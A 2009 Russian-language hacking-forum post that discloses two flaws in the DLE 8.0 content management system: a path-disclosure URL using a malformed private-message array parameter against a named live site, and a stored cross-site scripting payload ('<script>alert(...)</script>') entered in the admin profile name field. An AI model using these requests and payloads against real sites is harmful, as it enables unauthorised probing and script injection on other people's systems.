11.05.2009, 17:14
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
DLE 8.0 Раскрытие путей:
Код:
http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...
Активная XSS (требуется доступ в админку)...
идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
, в поле "Полное имя:" пишем
Код:
<script>alert(/Hacked by Wildshaman/)</script>
и смотрим в свой профиль на сайте ([site]/user/username)
(с)Wildshaman 2009 год
Последний раз редактировалось wildshaman; 11.05.2009 в 17:44..
|
|
|